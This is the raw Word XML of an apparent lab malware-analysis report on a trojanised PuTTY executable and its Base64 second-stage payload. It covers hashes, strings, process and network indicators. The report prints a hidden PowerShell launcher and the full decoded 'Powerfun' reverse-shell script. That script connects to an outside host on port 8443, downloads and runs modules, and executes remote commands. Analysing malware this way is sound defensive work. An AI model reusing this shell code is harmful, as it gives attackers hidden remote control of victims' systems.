              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C424D4">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>File Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08FCEAD6" w14:textId="5A29A180" w:rsidR="00C424D4" w:rsidRPr="00C424D4" w:rsidRDefault="00C424D4" w:rsidP="00C42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24D4">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>SHA256 Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C424D4" w14:paraId="6D9C0036" w14:textId="77777777" w:rsidTr="00C42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EB86C52" w14:textId="55D3C1F2" w:rsidR="00C424D4" w:rsidRDefault="00C424D4" w:rsidP="00F54E18">
            <w:r>
              <w:t>srvupdate.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04207E5A" w14:textId="6C0034FF" w:rsidR="00C424D4" w:rsidRDefault="00C424D4" w:rsidP="00F5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4D4">
              <w:t>A6AA84358130078F9455773AF1E9EF2C7710934F72DF8514C9A62ABEB83D2E81</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C424D4" w14:paraId="02C165A2" w14:textId="77777777" w:rsidTr="00C424D4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4C0F654" w14:textId="421850F3" w:rsidR="00C424D4" w:rsidRDefault="00C424D4" w:rsidP="00F54E18">
            <w:r>
              <w:t>crt1.crt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49B6BEC5" w14:textId="4FFD6A13" w:rsidR="00C424D4" w:rsidRDefault="00C424D4" w:rsidP="00F5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4D4">
              <w:t>A6AA84358130078F9455773AF1E9EF2C7710934F72DF8514C9A62ABEB83D2E81</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="114160B8" w14:textId="217B0D5B" w:rsidR="00C424D4" w:rsidRDefault="00C424D4" w:rsidP="00F54E18"/>
    <w:p w14:paraId="32D7B57B" w14:textId="272FB7A3" w:rsidR="00C424D4" w:rsidRDefault="0000714D" w:rsidP="0000714D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc85207997"/>
      <w:r>
        <w:t>srvupdate.exe</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="45161DCA" w14:textId="1ED091A4" w:rsidR="00C424D4" w:rsidRDefault="0000714D" w:rsidP="00F54E18">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00C424D4">
        <w:t xml:space="preserve">he initial executable that runs after a successful </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C424D4">
        <w:t>spearphish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C424D4">
        <w:t>. Loren ipsum…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427010AD" w14:textId="54719D54" w:rsidR="0000714D" w:rsidRDefault="0000714D" w:rsidP="00F54E18"/>
    <w:p w14:paraId="25AD8F16" w14:textId="77777777" w:rsidR="0000714D" w:rsidRDefault="0000714D" w:rsidP="00F54E18"/>
    <w:p w14:paraId="56EC92F9" w14:textId="52F0F15C" w:rsidR="00C424D4" w:rsidRDefault="00C424D4" w:rsidP="00F54E18"/>
    <w:p w14:paraId="30032025" w14:textId="02F50A88" w:rsidR="00C424D4" w:rsidRDefault="00C424D4" w:rsidP="00F54E18"/>
    <w:p w14:paraId="344AD66E" w14:textId="77777777" w:rsidR="0000714D" w:rsidRDefault="00C424D4" w:rsidP="00F54E18">
      <w:bookmarkStart w:id="5" w:name="_Toc85207998"/>
      <w:r w:rsidRPr="0000714D">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>crt1.crt:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA1A3C7" w14:textId="4898EC7D" w:rsidR="00C424D4" w:rsidRDefault="0000714D" w:rsidP="00F54E18">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00C424D4">
        <w:t xml:space="preserve"> Base64 encoded CRT file containing the second stage payload. Loren ipsum…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D28112" w14:textId="77777777" w:rsidR="0000714D" w:rsidRDefault="0000714D">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3334C658" w14:textId="77777777" w:rsidR="00942A2A" w:rsidRDefault="0000714D" w:rsidP="0000714D">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0000714D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78863583" wp14:editId="4FBFD4C8">
            <wp:extent cx="5172797" cy="3143689"/>
            <wp:effectExtent l="0" t="0" r="889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14D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA955D0" w14:textId="6036393D" w:rsidR="00F54E18" w:rsidRPr="00942A2A" w:rsidRDefault="00942A2A" w:rsidP="0000714D">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00942A2A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Fig 1: Base64 encoded cert of the stage 1 payload.</w:t>
      </w:r>
      <w:r w:rsidR="00F54E18" w:rsidRPr="00942A2A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="728D6D2B" w14:textId="44DD193B" w:rsidR="00F54E18" w:rsidRDefault="00F54E18" w:rsidP="00F54E18">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc85207999"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Basic Static Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="711DC3A6" w14:textId="6F9826E0" w:rsidR="00551809" w:rsidRDefault="006E01D3" w:rsidP="00551809">
      <w:r>
        <w:t>1). Hashes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7396"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E0064F" w:rsidRPr="00E0064F" w14:paraId="14322AB8" w14:textId="77777777" w:rsidTr="00E0064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0686C" w14:textId="77777777" w:rsidR="00E0064F" w:rsidRPr="00E0064F" w:rsidRDefault="00E0064F" w:rsidP="00E0064F">
            <w:pPr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</w:pPr>
            <w:r w:rsidRPr="00E0064F"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  <w:t>Md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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2C5FC" w14:textId="77777777" w:rsidR="00E0064F" w:rsidRPr="00E0064F" w:rsidRDefault="00E0064F" w:rsidP="00E0064F">
            <w:pPr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</w:pPr>
            <w:r w:rsidRPr="00E0064F"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  <w:t>334A10500FEB0F3444BF2E86AB2E76DA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0064F" w:rsidRPr="00E0064F" w14:paraId="2D63219A" w14:textId="77777777" w:rsidTr="00E0064F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D83F9" w14:textId="77777777" w:rsidR="00E0064F" w:rsidRPr="00E0064F" w:rsidRDefault="00E0064F" w:rsidP="00E0064F">
            <w:pPr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</w:pPr>
            <w:r w:rsidRPr="00E0064F"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  <w:t>Sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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CCAF7" w14:textId="77777777" w:rsidR="00E0064F" w:rsidRPr="00E0064F" w:rsidRDefault="00E0064F" w:rsidP="00E0064F">
            <w:pPr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</w:pPr>
            <w:r w:rsidRPr="00E0064F"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  <w:t>0C82E654C09C8FD9FDF4899718EFA37670974C9EEC5A8FC18A167F93CEA6EE83</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0064F" w:rsidRPr="00E0064F" w14:paraId="58E03858" w14:textId="77777777" w:rsidTr="00E0064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CC971" w14:textId="77777777" w:rsidR="00E0064F" w:rsidRPr="00E0064F" w:rsidRDefault="00E0064F" w:rsidP="00E0064F">
            <w:pPr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</w:pPr>
            <w:r w:rsidRPr="00E0064F"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  <w:t>Sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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8CC3E" w14:textId="77777777" w:rsidR="00E0064F" w:rsidRPr="00E0064F" w:rsidRDefault="00E0064F" w:rsidP="00E0064F">
            <w:pPr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</w:pPr>
            <w:r w:rsidRPr="00E0064F"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  <w:t>C6A97B63FBD970984B95AE79A2B2AEF5749EE463</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F5436E5" w14:textId="77777777" w:rsidR="006E01D3" w:rsidRDefault="006E01D3" w:rsidP="00551809"/>
    <w:p w14:paraId="127AEA75" w14:textId="74FC144A" w:rsidR="00E0064F" w:rsidRDefault="00E0064F" w:rsidP="00551809">
      <w:r>
        <w:t xml:space="preserve">2). Virus Total </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6615764F" w14:textId="21194EB3" w:rsidR="00E0064F" w:rsidRDefault="00E0064F" w:rsidP="00551809">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="637CDD25" wp14:editId="348C0BBA">
            <wp:extent cx="5943600" cy="1061720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701B" w14:textId="7ED70015" w:rsidR="00E0064F" w:rsidRDefault="00E0064F" w:rsidP="00551809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3). </w:t>
      </w:r>
      <w:r w:rsidR="00641B76">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>This is a 32bit portable executable - first bytes are 4D5A (MZ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CEF26E" w14:textId="7B38DB8C" w:rsidR="00641B76" w:rsidRDefault="00641B76" w:rsidP="005518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4). Strings of note </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17979764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There are a lot to readable strings but most of them seem to be related to the programs legitimate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funcitons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2D979957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E2796C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There are some strings that would be expected within a putty file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A58DD68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But there are some of concern, there is a powershell.exe string that is of interest, contains a base64 encoded piece of code. This is unexpected in Putty.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E32A8F6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88B876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powershell.exe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-w hidden -noni -ep bypass "&amp;([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scriptblock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]::create((New-Object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System.IO.StreamReader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(New-Object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System.IO.Compression.GzipStream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((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TrtVTgantvmcFWp5uLXdGnSXTZQJhS6f5h6Ntcjry9N8eXQOXxyH4rirE0J3L9kF8i/mtl93dQkAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60197190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0B1003" w14:textId="5B89BB7C" w:rsidR="00641B76" w:rsidRDefault="00641B76" w:rsidP="00551809">
      <w:r>
        <w:t xml:space="preserve">5). Import Address Table </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E2FE74" w14:textId="4E8AA527" w:rsidR="009B2946" w:rsidRDefault="009B2946" w:rsidP="00551809">
      <w:r>
        <w:t xml:space="preserve">Not really of much use as there are lots of legitimate process calls. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7329E341" w14:textId="77777777" w:rsidR="00E0064F" w:rsidRPr="00551809" w:rsidRDefault="00E0064F" w:rsidP="00551809"/>
    <w:p w14:paraId="46A155F7" w14:textId="0FCDFF81" w:rsidR="00F54E18" w:rsidRDefault="00F54E18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43285EDF" w14:textId="3F55E01E" w:rsidR="00F54E18" w:rsidRDefault="00F54E18" w:rsidP="00F54E18">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc85208000"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Basic Dynamic Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="4458BC13" w14:textId="5F88E46E" w:rsidR="00551809" w:rsidRPr="009944D5" w:rsidRDefault="00393D4A" w:rsidP="00551809">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009944D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Host </w:t>
      </w:r>
      <w:r w:rsidR="009E54DC" w:rsidRPr="009944D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IOC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03257ADB" w14:textId="77777777" w:rsidR="009E54DC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On detonation the file starts as putty would except a power shell window appears and then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disappers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00DE3104" w14:textId="77777777" w:rsidR="009E54DC" w:rsidRDefault="009E54DC" w:rsidP="009E54D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</w:p>
    <w:p w14:paraId="05D91097" w14:textId="77777777" w:rsidR="0048207E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Procmom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0048207E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0048207E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0048207E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> child process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE6E26C" w14:textId="659AFC97" w:rsidR="009E54DC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893249" w14:textId="4CD3023B" w:rsidR="009E54DC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Franklin Gothic Book" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Franklin Gothic Book" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="476997F4" wp14:editId="223455F9">
            <wp:extent cx="5943600" cy="424180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FE54" w14:textId="77777777" w:rsidR="009E54DC" w:rsidRDefault="009E54DC" w:rsidP="009E54D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DB8DE4" w14:textId="77777777" w:rsidR="009E54DC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It runs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powershell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command we capture above. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E351E1D" w14:textId="77777777" w:rsidR="0048207E" w:rsidRDefault="0048207E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96E6DA6" w14:textId="77777777" w:rsidR="00A819E4" w:rsidRDefault="00A819E4" w:rsidP="00A819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powershell.exe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-w hidden -noni -ep bypass "&amp;([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scriptblock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]::create((New-Object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System.IO.StreamReader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(New-Object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System.IO.Compression.GzipStream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((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D703A41" w14:textId="77777777" w:rsidR="0048207E" w:rsidRDefault="0048207E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C48D232" w14:textId="77777777" w:rsidR="0048207E" w:rsidRDefault="0048207E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26650AD" w14:textId="77777777" w:rsidR="0048207E" w:rsidRDefault="0048207E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7DF5891" w14:textId="10B4C7EC" w:rsidR="009E54DC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powershell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process connects out to a service on 8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E558C5E" w14:textId="3A20F48C" w:rsidR="009E54DC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Franklin Gothic Book" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Franklin Gothic Book" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38F75285" wp14:editId="0BDD0BF9">
            <wp:extent cx="5943600" cy="65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1FE6" w14:textId="77777777" w:rsidR="00393D4A" w:rsidRPr="00551809" w:rsidRDefault="00393D4A" w:rsidP="00551809"/>
    <w:p w14:paraId="5C83B8E3" w14:textId="07A547E4" w:rsidR="00551809" w:rsidRDefault="006D3B17" w:rsidP="00551809">
      <w:r>
        <w:t xml:space="preserve">Taking the Base64 encoded string and </w:t>
      </w:r>
      <w:r w:rsidR="008403BF">
        <w:t xml:space="preserve">decoding it on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008403BF">
        <w:t>Remux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008403BF">
        <w:t xml:space="preserve"> system produces a zipped file, which in turn contains the following script. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212D7163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Powerfun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 Written by Ben Turner &amp; Dave Hardy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67639ED5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D1303C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function Get-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Webclient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B346C5A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652D8A97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New-Object -TypeName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Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F2AB127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wc.UseDefaultCredentials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$true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DAE708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wc.Proxy.Credentials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wc.Credentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3FDDEAC8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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F84E26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67EF85C0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function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powerfun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AEB1740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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E7DFCB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Param( </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75815E29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[String]$Command,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F064EEA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[String]$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Sslcon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14:paraId="300E694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[String]$Download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EAD0B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) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5256E915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Process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B389F38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$modules = @()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76412A51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($Command -eq "bind")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0152BF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A05E23">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D043D2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    $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listener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 = [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System.Net.Sockets.TcpListener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>]8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC6D8B5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    $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listener.start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()    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7476B1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    $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client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 = $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listener.AcceptTcpClient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>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FA1D19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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713B15C8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if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 ($Command -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eq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 "reverse")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BF815C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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D268E3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    $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client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 = New-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Object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 System.Net.Sockets.TCPClient("bonus2.corporatebonusapplication.local",8443)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0E845D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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF8C195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> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2771F8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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$stream =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client.GetStream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434C0A7D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73B3D9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Sslcon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-eq "true") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B7B8E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14:paraId="213E56D5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sslStream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New-Object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System.Net.Security.SslStream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stream,$false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,({$True} -as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Net.Security.RemoteCertificateValidationCallback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]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F95F115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$sslStream.AuthenticateAsClient("bonus2.corporatebonusapplication.local") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664EAC4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$stream =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sslStream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335524D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5FA33A9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40CE046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[byte[]]$bytes = 0..20000|%{0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D04903B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text.encoding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]::ASCII).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("Windows PowerShell running as user " +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env:username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" on " +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env:computername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"`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nCopyright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(C) 2015 Microsoft Corporation. All rights reserved.`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n`n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")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431E071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stream.Write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($sendbytes,0,$sendbytes.Length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7203E203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027E4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if ($Download -eq "true")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB461DB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14:paraId="5F1B017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text.encoding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]::ASCII).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("[+] Loading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modules.`n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")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A15578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stream.Write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($sendbytes,0,$sendbytes.Length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCCA414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ForEach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($module in $modules)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BF3D4D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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9F88F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(Get-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Webclient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DownloadString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($module)|Invoke-Expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52573FD4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783893C2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2D898153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330CC5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text.encoding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]::ASCII).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('PS ' + (Get-Location).Path + '&gt;')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347D9D36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stream.Write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($sendbytes,0,$sendbytes.Length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5204EA92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1A7C798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while(($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stream.Read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($bytes, 0,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bytes.Length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)) -ne 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA0E2EB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14:paraId="032E1CE7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EncodedText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New-Object -TypeName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System.Text.ASCIIEncoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B1780F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$data =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EncodedText.GetString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($bytes,0,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6FBC5728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sendback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(Invoke-Expression -Command $data 2&gt;&amp;1 | Out-String )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276883E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9A189A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$sendback2  =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sendback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'PS ' + (Get-Location).Path + '&gt; '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AEAF4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$x = ($error[0] | Out-String)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1987F16B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error.clear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0F45648D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$sendback2 = $sendback2 + $x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742F1E0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A0FF10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sendbyte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text.encoding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]::ASCII).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($sendback2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1165EBF2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stream.Write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($sendbyte,0,$sendbyte.Length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E19624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stream.Flush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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDD176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02D8FA02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client.Close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58FBDBCB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listener.Stop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512BD603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19BE04B6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29C788D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DA82D0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powerfun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-Command reverse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Sslcon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true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5209C5BB" w14:textId="77777777" w:rsidR="00A05E23" w:rsidRDefault="00A05E23" w:rsidP="00551809"/>
    <w:p w14:paraId="3B9F53C6" w14:textId="77777777" w:rsidR="00D77182" w:rsidRDefault="00D77182" w:rsidP="00551809"/>
    <w:p w14:paraId="237558E0" w14:textId="2C66F371" w:rsidR="00D77182" w:rsidRDefault="00D77182" w:rsidP="00551809">
      <w:r>
        <w:t xml:space="preserve">This looks to be part of the Metasploit package that opens up a secure shell backdoor into the </w:t>
      </w:r>
      <w:r w:rsidR="009944D5">
        <w:t xml:space="preserve">system that the putty.exe is run on. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677788B9" w14:textId="77777777" w:rsidR="006D3B17" w:rsidRDefault="006D3B17" w:rsidP="00551809"/>
    <w:p w14:paraId="74865A04" w14:textId="77777777" w:rsidR="006D3B17" w:rsidRDefault="006D3B17" w:rsidP="00551809"/>
    <w:p w14:paraId="4B8D3F4A" w14:textId="3148789E" w:rsidR="009E54DC" w:rsidRPr="009944D5" w:rsidRDefault="009E54DC" w:rsidP="00551809">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009944D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network IOC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306F768F" w14:textId="77777777" w:rsidR="00A819E4" w:rsidRDefault="00A819E4" w:rsidP="00A819E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DNS query to </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F24166E" w14:textId="03AD69DE" w:rsidR="00A819E4" w:rsidRDefault="00A819E4" w:rsidP="00A819E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Franklin Gothic Book" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Franklin Gothic Book" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23FA269F" wp14:editId="007AD797">
            <wp:extent cx="4914900" cy="142875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4290" w14:textId="77777777" w:rsidR="00A819E4" w:rsidRDefault="00A819E4" w:rsidP="00A819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6F8EE3" w14:textId="77777777" w:rsidR="00A819E4" w:rsidRDefault="00A819E4" w:rsidP="00A819E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Then some HTTP gets </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C98EFA" w14:textId="77777777" w:rsidR="00A819E4" w:rsidRDefault="00A819E4" w:rsidP="00A819E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7EF80A" w14:textId="0E91C036" w:rsidR="00A819E4" w:rsidRDefault="00A819E4" w:rsidP="00A819E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Franklin Gothic Book" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Franklin Gothic Book" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EA87A7A" wp14:editId="47F7F57E">
            <wp:extent cx="5943600" cy="1349375"/>
            <wp:effectExtent l="0" t="0" r="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4842" w14:textId="77777777" w:rsidR="00700C81" w:rsidRDefault="00700C81">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C4824A6" w14:textId="313EDA78" w:rsidR="00700C81" w:rsidRDefault="00700C81">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Followed by POST activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AE780D" w14:textId="77777777" w:rsidR="00700C81" w:rsidRDefault="00700C81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</w:p>
